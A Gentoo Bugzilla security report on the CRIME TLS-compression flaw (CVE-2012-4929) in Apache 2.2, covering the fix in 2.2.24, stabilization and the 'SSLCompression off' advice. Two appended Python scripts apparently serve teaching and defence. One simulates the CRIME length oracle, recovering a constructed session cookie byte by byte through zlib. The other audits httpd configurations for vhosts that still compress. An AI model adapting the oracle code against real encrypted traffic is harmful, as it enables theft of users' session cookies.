Field | Value
---|---
Summary: | <www-servers/apache-2.2.24: unable to disable TLS compression, vulnerable to CRIME attack (CVE-2012-4929)
Product: | Gentoo Security
Component: | Vulnerabilities
Reporter: | Hanno Böck <hanno>
Assignee: | Gentoo Security <security>
Status: | RESOLVED FIXED
Severity: | minor
Priority: | Normal
CC: | josh, mail, patrick, proxy-maint, pva
Version: | unspecified
Hardware: | All
OS: | Linux
URL: | http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcompression
Whiteboard: | B4 [glsa]
Package list: | 
Runtime testing required: | ---
Bug Depends on: | 
Bug Blocks: | 459264
Description

Hanno Böck
2012-10-17 08:40:37 UTC

CVE-2012-4929 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4929): The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack.

2.2.24 is still not released yet.

Would it be bad if there were a 2.2.23-r1 with the same ebuild as 2.2.23 plus the patch in Comment #1?

At last, can someone release Apache 2.2.23-r1 with this patch, or has Gentoo Linux completely died and does everyone ignore security?

Nah. All we need is a version bump; 2.2.24 got released yesterday.

Cool, but is it good to wait for the new version? All other Linux distros create their own patch and release a new version...

And one more thing: the new Apache release is from 2013-02-25 and is still not in portage...

```diff
+*apache-tools-2.2.24 (28 Feb 2013)
+
+  28 Feb 2013; Tony Vroon <chainsaw@gentoo.org> +apache-tools-2.2.24.ebuild:
+  Version bump as required for =www-servers/apache-2.2.24; for security bug
+  #438680 filed by Hanno Boeck.
+*apache-2.2.24 (28 Feb 2013)
+
+  28 Feb 2013; Tony Vroon <chainsaw@gentoo.org> +apache-2.2.24.ebuild:
+  Upstream security fix adds "SSLCompression" parameter to disable flawed
+  compression support and thus protect against the CRIME attack. For security
+  bug #438680 filed by Hanno Boeck.
```

Arches, please test & mark stable:
=app-admin/apache-tools-2.2.24
=www-servers/apache-2.2.24

Target keywords: "alpha amd64 arm hppa ia64 ppc ppc64 s390 sh sparc x86"

Users, you need to set "SSLCompression off" in any VirtualHost that declares "SSLEngine on" in order to fully secure your installation.

A tester is available here: https://www.ssllabs.com/ssltest/

amd64 stable
x86 stable
ia64 stable
arm stable
alpha stable
s390 stable
ppc64 stable
ppc stable
hppa stable
sparc stable
sh stable

GLSA vote: yes.

YES too, added to existing request.

This issue was resolved and addressed in GLSA 201309-12 at http://security.gentoo.org/glsa/glsa-201309-12.xml by GLSA coordinator Sean Amoss (ackle).
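The length-oracle attack that the CVE text in the description above summarises, as an added example that is not part of the bug report, of httpd or of the CRIME paper: an attacker who controls part of a request (here the URL path, e.g. via a link the victim is made to follow) and can see the size of the compressed-then-encrypted request recovers a secret cookie one byte at a time, because a guess that matches the cookie compresses better than one that does not. zlib's DEFLATE stands in for TLS compression; the request text, the `example.com` host and the cookie value are constructed. The "filler" trick (distinct bytes in the 0x90 to 0xff range, which DEFLATE's fixed Huffman code spends 9 bits on instead of 8, so that summing over eight fillers cancels byte-rounding noise) is this script's own way of making the oracle deterministic and assumes zlib picks fixed Huffman blocks for input this small; the report describes neither.

```python
import zlib

# Constructed sample, not taken from the bug report: the victim's browser
# attaches this secret cookie to every request it sends to the site.
SECRET_COOKIE = b"sessionid=7f3a9c"

def build_request(path: bytes) -> bytes:
    """The attacker controls only the path (for example through an
    injected link); the cookie is appended by the victim's browser."""
    return (b"GET /" + path + b" HTTP/1.1\r\n"
            b"Host: example.com\r\n"
            b"Cookie: " + SECRET_COOKIE + b"\r\n\r\n")

def compressed_len(plaintext: bytes) -> int:
    """The oracle. With TLS compression the ciphertext length is the DEFLATE
    output length plus a constant, so a man-in-the-middle watching record
    sizes learns exactly this number. zlib stands in for the TLS layer."""
    return len(zlib.compress(plaintext, 9))

# A guess that extends the match between path and cookie by one byte saves
# 7 or 8 bits, which may or may not cross a byte boundary. DEFLATE's fixed
# Huffman code spends 9 bits on literals 0x90..0xff, so k distinct such bytes
# shift the bit alignment by k; summing over k = 0..7 makes the correct guess
# strictly shorter in total than every wrong one. (Assumption: zlib chooses a
# fixed-Huffman block for input this small, which it does in practice.)
FILLERS = [bytes(range(0x90, 0x90 + k)) for k in range(8)]

def score(guess: bytes) -> int:
    """Total oracle output over all alignments for one attacker guess."""
    return sum(compressed_len(build_request(guess + f)) for f in FILLERS)

def recover_secret(prefix: bytes, length: int,
                   alphabet: bytes = b"0123456789abcdef") -> bytes:
    """Byte-by-byte recovery: append each alphabet byte to the known prefix
    and keep the one whose request compresses best."""
    known = b""
    for _ in range(length):
        scores = {bytes([c]): score(prefix + known + bytes([c])) for c in alphabet}
        best = min(scores.values())
        winners = [c for c, s in scores.items() if s == best]
        if len(winners) != 1:
            raise RuntimeError("oracle ambiguous at byte %d" % len(known))
        known += winners[0]
    return known

if __name__ == "__main__":
    secret_len = len(SECRET_COOKIE) - len(b"sessionid=")
    print(recover_secret(b"sessionid=", secret_len))
```

The attacker needs about `len(alphabet) * 8` observed requests per recovered byte, which is why the mitigation is to make the plaintext length independent of the guess by not compressing at all; the `SSLCompression off` directive the stabilization comment asks for does exactly that on the server side.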
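The per-VirtualHost requirement from the stabilization comment above ("SSLCompression off" in every vhost that has "SSLEngine on"), as an added audit script that is not part of the bug report, of httpd or of the Gentoo ebuild: it reads httpd.conf-style text and reports the TLS vhosts that would still negotiate compression. The configuration excerpt is constructed; it places the vulnerable shape next to the corrected one. The script assumes, as the comment says, that a vhost with `SSLEngine on` and no `SSLCompression off` still compresses, and additionally that a server-level `SSLCompression` directive is inherited by vhosts (mod_ssl's usual context rules; the report does not say this).

```python
import re

# Constructed httpd.conf excerpt (not from the bug report). The first vhost
# is the vulnerable shape the comment warns about, the second is the fix,
# the third never enables TLS and must not be reported.
SAMPLE_CONF = """
Listen 443
<VirtualHost *:443>
    ServerName weak.example.com
    SSLEngine on
    SSLCertificateFile /etc/ssl/apache2/server.crt
    SSLCertificateKeyFile /etc/ssl/apache2/server.key
</VirtualHost>

<VirtualHost *:443>
    ServerName fixed.example.com
    SSLEngine on
    SSLCompression off
    SSLCertificateFile /etc/ssl/apache2/server.crt
    SSLCertificateKeyFile /etc/ssl/apache2/server.key
</VirtualHost>

<VirtualHost *:80>
    ServerName plain.example.com
</VirtualHost>
"""

VHOST_RE = re.compile(r"<VirtualHost\b[^>]*>(.*?)</VirtualHost>", re.S | re.I)
# One "Name value" directive per line; httpd directive names are
# case-insensitive, so they are lower-cased when stored.
DIRECTIVE_RE = re.compile(r"^[ \t]*([A-Za-z]\w*)[ \t]+(.*?)[ \t]*$", re.M)

def parse_directives(text: str) -> dict:
    return {name.lower(): value for name, value in DIRECTIVE_RE.findall(text)}

def vhosts_with_tls_compression(conf: str) -> list:
    """ServerNames of vhosts in which mod_ssl would still compress.
    Assumptions: a vhost inherits a server-level SSLCompression setting,
    and compression stays on unless the directive is set to 'off'."""
    server_level = parse_directives(VHOST_RE.sub("", conf))
    flagged = []
    for body in VHOST_RE.findall(conf):
        d = {**server_level, **parse_directives(body)}
        if d.get("sslengine", "off").lower() != "on":
            continue  # no TLS in this vhost, nothing to compress
        if d.get("sslcompression", "on").lower() != "off":
            flagged.append(d.get("servername", "<no ServerName>"))
    return flagged

if __name__ == "__main__":
    for name in vhosts_with_tls_compression(SAMPLE_CONF):
        print("TLS compression still enabled:", name)
```

Run it against the real configuration with `open("/etc/apache2/httpd.conf").read()` (plus any included vhost files, which this script does not follow) before and after the upgrade: on apache before 2.2.24 the directive does not exist, so every TLS vhost is reported and nothing in the configuration can fix it, which is the point of the bug.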